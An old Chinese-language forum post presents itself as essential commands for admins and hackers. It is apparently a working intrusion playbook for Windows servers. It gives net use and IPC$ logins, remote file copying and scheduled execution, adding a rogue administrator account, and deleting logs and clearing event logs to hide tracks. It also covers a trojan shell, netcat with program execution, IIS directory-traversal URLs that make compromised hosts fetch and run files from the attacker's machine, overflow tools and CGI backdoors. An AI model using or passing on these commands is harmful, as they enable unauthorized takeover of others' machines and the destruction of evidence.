返回列表 回復 發帖

網管和黑客都必須知道的命令

作者: wen 日期: 2006-9-1 00:33 閱讀: 871打印 收藏

常用的幾條net命令:

(與遠程主機建立空管連接) net use \\ip地址\ipc$ "" /use:""

(以管理員身份登錄遠程主機) net use \\ip地址\ipc$ "密碼" /use:"administrator"

(傳送文件到遠程主機winnt目錄下)copy 本機目錄路徑\程序 \\ip地址\admin$

(查看遠程主機時間) net time \\ip地址

(定時啟動某個程序) at \\ip地址 02:18 readme.exe

(查看共享) net view \\ip地址

(查看netbios工作組列表) nbtstat -a ip地址

(將遠程主機c盤映射為自己的f盤) net use f: \\ip地址\c$ ""/user:"administrator"

(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add

net localgroup administrators 用戶名 /add

(斷開連接) net use \\ip地址\ipc$ /delete

掃尾:

del c:\winnt\system32\logfiles\*.*

del c:\winnt\ssytem32\config\*.evt

del c:\winnt\system32\dtclog\*.*

del c:\winnt\system32\*.log

del c:\winnt\system32\*.txt

del c:\winnt\*.txt

del c:\winnt\*.log

一、netsvc.exe

下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:

netsvc /list \\ip地址

netsvc schedule \\ip地址 /query

netsvc \\ip地址 schedule /start

二、opentelnet.exe

遠程啟動主機的telnet服務,并綁定端口到7878,例如:

opentelnet \\ip地址 用戶名 密碼 1 7878

然后就可以telnet到主機的7878端口,進入dos方式下:

telnet ip地址 7878

三、winshell.exe

一個非常小的木馬(不到6k),telnet到主機的7878端口,輸入密碼winshell,當看到cmd>后,可打下面的命令:

p path (查看winshell主程序的路徑信息)

b reboot (重新啟動機器)

d shutdown (關閉機器)

s shell (執行后你就會看到可愛的“c:\>”)

x exit (退出本次登錄會話,此命令并不終止winshell的運行)

cmd> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)

四、3389登陸器,gui方式登錄遠程主機的

五、elsave.exe

事件日志清除工具

elsave -s \\ip地址 -l "application" -c

elsave -s \\ip地址 -l "system" -c

elsave -s \\ip地址 -l "security" -c

執行后成功清除應用程序日志,系統日志,安全日志

六、hbulot.exe

開啟win2kserver和winxp的3389服務

hbulot [/r]

使用/r表示安裝完成后自動重起目標使設置生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

想要連接到某處: nc [-options] hostname port[s] [ports] ...

綁定端口等待連接: nc -l -p port [-options] [hostname] [port]

參數:

-e prog 程序重定向,一旦連接,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-g num source-routing pointer: 4, 8, 12, ...

-h 幫助信息

-i secs 延時的間隔

-l 監聽模式,用於入站連接

-n 指定數字的ip地址,不能用hostname

-o file 記錄16進制的傳輸

-p port 本地端口號

-r 任意指定本地及遠程端口

-s addr 本地源地址

-u udp模式

-v 詳細輸出——用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉——用於掃描時

八、tftpd32.exe

把自己的電腦臨時變為一臺ftp服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用unicode漏洞或telnet到肉雞,例如:

http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機ip地址 get 文件名 c:\winnt\system32\文件名

然后可以直接令文件運行:

http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是iis的printer遠程緩沖區溢出工具

idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有asp執行權限的目錄。然后用ie瀏覽器連接。

2005.12.04不預期遇見什麼、才可能什麼都能遇見。
如果你是會員,有任何使用上的問題,請發短訊給我(wen)
如果你是訪客的話,註冊之後可以得到完整的瀏覽權限
返回列表